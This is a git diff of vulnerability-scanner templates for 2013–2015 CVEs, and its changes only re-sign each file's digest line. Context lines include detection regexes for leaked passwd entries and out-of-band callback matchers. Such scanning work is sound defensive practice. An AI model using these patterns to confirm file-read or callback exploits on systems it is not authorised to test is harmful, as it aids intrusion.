490a004630440220785e9a2da85c8f8892931cdcfe5454d245e605e172f046d624afd1f73c6efa9102204aca192670c52d156d19c8951b6acc0346f4ceaec46b126e2fda203b05c9142e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd5a2a5e71ce397c3bf24cb6547377572ca08745b26f3eed47921adab534ff8c022100b036ad0fe2cc7fe9876aa5dcd9be0354eb994bf3b89a0ec163ea41ad6a29be40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index ca0118d9fb..3d944f4bee 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0698633db19c7ee6304b0508cef2dad7444765a481ee2ec25a24d87912288130220022330049fa197bb4401c64e35b29b9cf338e5a96d9643116af691d670c9a030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201594ab82faa88c2638b590f8d2290c98cbba2ee290211a02a238f09cdf59789e02206977759c62401acb13c22b225a20b6b17866f8aacf67b8a67590ea7f7b0bc8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 1cf21a693b..255fd4324b 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220015e7519b40c0265f82ad29ddf8a0ef4ffe631a278f3b4378f25a8b21fb69a24022070298fb5eb7f02976f495774c65af5d412d820c8952a417b25f05b9454a8d5f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 7b44d9fc5c..44c34d428f 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -53,4 +53,4 @@ http: - type: regex regex: - "root=.*:0:0" -# digest: 490a0046304402201ccc1057845d216a29c77034e87fe721f25d7966c7df208ba2d565e3d8aa359002203270ff81ddfa4ad50431e211194a72cd7391222acc08a00002b9ca6f27eb1075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 32eaf72eb4..424bb0c43a 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -64,4 +64,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100e9b545721b8eadd409f973249f3c65d80cb03daeb25fc7c4c07bbcebcaea9c1e022023b7f4025389b87a8a27476a11ed9496c6b151bc7d935293ce53b174837d93ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed54d64a6a5d98f883eec6e0dc9bf3fb76b87372f2f242bcad697a3e8b0ada2d022100adb7292dab8008a25c2e9765555bc1f1eacac15af2ca9d04af09f6e758fd78ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index ae61d70fa8..42c162a772 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de25086e4168c326842088afcdd5f4bf7be05f9dec03e3840c0151b7884da00502203f4f6a99411f4ad0eaccfffa263b70d1bfc55fe107c41e1f343d53942c4f8ce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a89179af6be12060f1fe5577e41d64f1b2826960d0485ad9e47556edc6ce21aa02205a19be61ffd6eb717e6ba7e0e9fe45d7292c97bf00654bebf6691684a9e5aef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index efc57f7ca2..ac36dc0e9f 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a4627bf1a8cf08412ca15486768756a9e0cbf99bdb6ecb44cc3d0024a600e4e022076be4d20c9cf0228bd87afe08b460706d78127294b80bf7acc08c4c585b19ea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 10d66a4abe..6b84e07eae 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -40,4 +40,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4a0a0047304502210080c2d3997f9dac4e40a72e4d7ce8bff9d466e82ea8b35826d8562da060184f5f02200916311bde8859202dae4d2e95730cab1bc3e0790e1d44df6bd665fee509ee33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e371572751932d4a500df96a892091eba4e0a4d8ce6a52634b13e38cd64f05cc022100dcb4be0eedfb4cb66a15ce756a7a6db6b4fd32eb5bd445bc094c025d8706bfd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index d92e4e86e4..5a670d5f91 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cbeff7eefe394532ca6c1c963317f9293853775305feb09955cb0f14537d36c70221009563d26867952ca7413d2a69842a55377deae81d1899284c29d744cf25e3def1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f047a6a60901eeb5016353d7e3b93092b406eb7c4eaa8ecf9759f8b6ea7e81a022100c25b83b98679c1421d0b2383cdc9c6f9c736059731e9452b26d580b80e55e4ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 15e7e0ac71..1b31232ed7 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096f620b7bf4c7b79e47114041645ca4a38ba6565a58fa532d3e2b4a13c2b2a98022100f2b693df5865b63e790500bd3a74e831d3787400539e5f1f3f5b1247720e3b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032e80b0db58d467a4ce0dccb54620714fa677489117263f882c989d96adb1e9b022100a4a43436790a6bfae53280a94851a270b2f0ae270d5b78e1c53f5be7f1911963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 2502b1b8c3..c28ab34ad6 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ff4eaaee2913576f9c3773ea802f74aae2e43c9908293ae0ace73571b4b408602201e15bdaa1cc32a145d1c1700722721575f788b689ceef9d348d46d0e7bad5d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c75efbf9b064d21bacbd48c486b930e90217b4ae6e2d0ae67761ed727e5ae1c022100e524324c159f69fa14357b63d62c412273768e8b0377d797d5d02df83e454767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 0977500622..17c94b7d1a 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -45,4 +45,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100c37008edf1fe3fabb4fc45913846f7863a859fbd08e0cb4158b9320f2e574da9022100887758ea44784672f7027ed4486412adb7af2c679b0aae9d158eeffe91b2f93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index e436f76d58..5882453bd0 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100eb3a2126592b46c62f772197d72ab5179bc61f2ad644dd96062a822cb373480f02204118f118160b84105f139acfa90dae616993e20101d1fcca5c572f30068d9baf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207af10a42ac3fac82b8537fcd02ef03a3d6d1c789570c336dd960af2488b7656a02200bf8bf6552331293f0e50b7c92c5874a81bc4df67abaae00fa0bd4042a8ea2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index f90f57579f..3d0fb8cb3f 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bbd63d9b8fee0b533abac3f8144cdaccba625bb8f78e461a4f1ac10efad47536022100d52f1c11b76db959daec1e73c165385e65dcd0f99ad9cd609daaa0ddcaf687ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100808155b3e9bd0da8758fe21105db7243f46e6789fa209d6a6b73f219ca1733ce02210097568398a70029c36962eedf476883fb966f09065544bfcf252adbef6af31cd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index a36d551471..f945869678 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ec0f81b57bfdda00a32077b2bc9483bb3a512ed8d56d69e51763746987b647802205f51bc7daeef32bb654e5e089fa8862f96472bd06c3f2395588249b41b6c8eed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef7dd0b7d622170e0b3183ca4135cdfad57884e222893005036c0ef48b5d9865022020a8a775e34d139c075b03de4b79c88dc16545446de167ea20451d436927445f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 0542260e60..51756c4c86 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022014bf39856906955eb8782842f6a45f0ece9a2141d035072e09ab60363829e70102210093aa4a14a7eea3b5d2f1a967ffd562ad38aa5ef41ee1ebf0c45e8fa52f6990c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2bd4ee7dd4410fcf6088eb1ea98117e6cb1d07778ec987702193ec58f1a32d2022071f4dedaed29b1e6c680e09b1e91688a875574e60a2b29ceb986f8ee3ec5d2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 24c67122e2..90fe1a1ae5 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095ad2afc5260565eaa873fec623f6df0468df5ff0638df460dc9318896c04b1b022100d43ec1e78b00df0e2ad2c0805170c9e5b05a5d87267cf4710bd9090011906266:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7fabab204109ff54cd90e8f812aa822a90c66eb03d80cebef59c28ba65c19920221009c5c4a4fbb6cdd88155f2a4e88f39da697ce828dac7d469c80e87613d4103203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index daf200fd23..6667b596ff 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203241f8151bfde20d1a08e2e28fdb9c5cf6e0464d2d864c80efb938c7c1b7828f02200a7cdfef404e295f06e6bc7100fe5adf6c88b667ef2fe2b6aa001f792c5a89a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220549fc7717d5fce647686a6dbb01d128134199b2bb5d130536dc6fdb4300d7b5c022100e23b8a0fdab8f1482a479f40a7523e3c8398707233dc2482ccac988725d727ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 4a4b442364..8df99e4d08 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab00eb81ae19e88ba8dd750e7ef1ca58bb603418f61cbddb5ceabbfcb875479c022100df2ed01810460060959cc0b0658bcb5677cba5e155310cb06a61a10c33e2794b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b9d4be5067970ffa3d8e02079c4abf8441c982e0b6c0c19941b0a7e203321fc02201fede3e0462fdb7ea5a4287170f517900610ef02f321923bb5a57227cf800b54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 41a5cbee59..92a45f5fbf 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074b4722e27dbfe810f81a6e3c31689440458281982a86af415cfa0ef24a8b6f302202cf642515626b9b81ef7ee227391116f3a353ef89bb7d0d459813c4b54c978d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d69ee1fd512ebb21e3ef12903964a91f9d7ada78be70bf55c71ec977f4900eb2022007f9bf1c552bd638825024917e8ce6ed2768429fc5db5f1f78eda30f4cf9bebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index b210fb3874..5b7d648f67 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b2ba52eb8ad921e38820317a6e2e527a7b1e855b2978f116de5bc686654c66d022100eac95a9cf0926fcf59ca4964ef1ebb39f83197217bd5ec16267c7a8b3e87bc5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index d0e691c55d..8a02870d18 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200dec951397987aa3500deb5f6601b691bdba049f40e0624f506462bd4a4cb4c2022100a421e36e7d907eda25de0dfb9052c4e6f36f0af767108efb0447b763896d4612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b55ba5c5bc0603bce568d991022be9818e26de9699fdecf5a734aa850dc13200022042473693f82c1c425062e207b10679c75162af12660a60d0038719261ec111d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 6754e20d1c..2eb92670c9 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202adec40566bca6f4aba92ece47d3b46a7568ac5dec42ddb09ef2269a7bad5d610221009a3c42274dbdac51e768ec48c31b65c86c3691ce8c2d5d1bf1860da0e51b8c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 50fb708173..dd9b9f18af 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204edbc71eff8a4e2f830a6b91adba5649b330babc92cb13db3bc72f9eeadeeaed022032a4104312eed8dab0af4f004d133ef1c781de314cd466bcef35194a980c55c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index e9c6d771b3..a86a9adae4 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009a24def002f8a4bd70e39d8ad69dc0e8051137d7213f809261c9105a25ce3681022071bec7017d9ee596e649bdb88e2c965e863a0531795772e8c85e0f41289cedd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008cd58614259c9a012c61fe7183cfc0181cb4dfdcff7af29abbb230af9ca182030220578522a18a3218b1c9d9495d3952b6358db0eb32fbf5cddf361c578924a35316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 64be5d6571..7f9333b458 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210083cc37bc0cfb8d03a0fbfe313996f58d59990e7b75e2645f695f5ba958fdf53c02203227d42e9cddfc520abf96cc7bfee095f783dbc07a848aeeb05e7ad2444305e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ab09228c893b1ee93d8eef722707d966f04b94eaf2b6979ef784accbbca3cd20220253e29578ffae76a82b5b19b0a066d92ae8ebcc1950101953d4b994cd366b495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 85420bf5a4..faf2b9414d 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502202595a069dd8c91483234f55ce0f0f659b298efc4ffdb12e9e12b00fb5fa9f4b3022100873f14828e95609b047e81f458d24ca18cf2b1a27d0cc698c52f6763887c2622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index bde1fa1ee7..e00d43f46f 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c620d54877d9be7106fc01f8fc1c35c7f936d78777b4cc28acf97b0b07ce379e022100b6b55e3fd248f74bb14767c251f476574d10aa9d549b7fc3e5703cba6666d7d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201aa63eb48fb97f26c497ba51d0b774678d7f99181ff592e8245940df0586f135022100ec53c24be8fe6c849d5700ba693ce9821767849c3c764eef8459fe2120e546fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index ac4b7af87e..5561db4d36 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e3e7ea689da29ba520b3e53e881d357b945497a8c90b7edd9f9b7b0bcff16fa9022016666d67d504a05276a2e7a67de8e0666e7ac94c1ecbe542df31724ffd3fc17a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index dd8c7bbaaa..874a0eda0e 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206ef347d56b3fc87ea612bca93fe6c2153830770c9ed14ce64a7cdea340f115df02204c27041b58df411bb743e71416f39543dd6b752f98119449605bbd56a599a648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afdf2fdb6e0145b27c1806b74b05004660dd804acc398f60bd9721b973b0a87002205e93a7b347f6ed674908692a1a6427dd067c9e72cd4c40ed43ea901641042ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 4d03c321b3..42ff22de8e 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004d5edebc63e139b163fb36dce11c91588ef524fead192d65d70423f3785896e02203462340167a5610efa247b870f6aa54922674f91e98f59bea65fe99eff56d322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000e916dda30ee40dc5bdad6723685045a740d238b72ba35fb08f356767409e0f02207ed3256489eeb84f8776c5b31fe38cd30bc00b5e06645fb8e739a43040b27594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 77ee040176..99fd990224 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201928918415448d73e423fc4a5b49c1c58eb726d38293c0c5e19cdc8524ea1436022100b6742bb476643f5a5b07bcfb23a648559677a841affd59588e2a53b5f3218737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 782d8ccbe2..bf470a041d 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cbe0d4e088fc9c25a9190c23c2560e93cf14cda856a3dd38a8d1b16ca0f0ef2d022100b6d3e3303a49497d473d330fc764b577495d2c4e660f1cc47c35e2cad1dfa20f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059a1c4530f87d483652235366963039a278c43e8017648b5e66c1ded53ac1bea0220103c20d421e6f063c7939b78129fffefe71a58c02ec2905ef3b31d3a3d9f29e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 3c75ac3153..444756f589 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204e2c137c6822eb1a1a882568dfd8e672e6fd8ccc88b7759a1f28049b2e96ebf202210080baac80d81fdeba488c47512ff34cb430c21404633e780a8c1aa1f468600821:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d29b625c44598d6fd40ec90007af146d602b03e0287b866e32ee90257f77d1da022100c02ac12b1515f84fdbe501346868b0b6d8e31333da3750a76b2e01f9e0f40642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 3f662ae1e2..611ec88318 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078b2ccf9ead8aa22de8aa30177fb8c9914fe401ae60993c00e9e964a7f2431bb022072b7df852b64c283ad6f90017fb1332cd23540e95873b7931fee9cec104526dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201bd23514796529bf6c27e2ed45c08b9340e59a12f04603253332ae63240298e60221008e8246877e3b62ffa7b8953c44fa788db96ddf30e232a558beca8f4d501588b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index 271814ca3b..4398251cff 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -48,4 +48,4 @@ http: part: header words: - "Microsoft" -# digest: 4a0a0047304502206932adc7c239c671e84b13435aa402957f1d9c4c35b083797179f5405e60108e02210093e7b8986dde6e947bf976aa625bda698584e8cc3a475d4b872ac9f9c4e208f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a635f022b45e7a586ad5e4a4564a246654390e2469d4729272954c932b441eab02204e4776dc6153c0fcae6eaca611da6998b1e8e23d7bef84872c029f267912cd1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 5c80823b3b..da134bc3b4 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c913d9c92793dcd1aecdc85281cdef7bed437fbed5684e4372c29a34892aa9b022100fe7087cf4f073a5b93c066e5c1c0b12a16df5630c0b2c58eed34b6ef6eb51bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbd94b21f5439ca4ec407e9189271984eee7263b4225ff0c73f83bdad8a7d5b202210088a587ab57ec51554054af59f5f81cc6d51732d5c6f5928c95b3c4d7090af0df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml index 80d78378b4..63f8969bfe 100644 --- 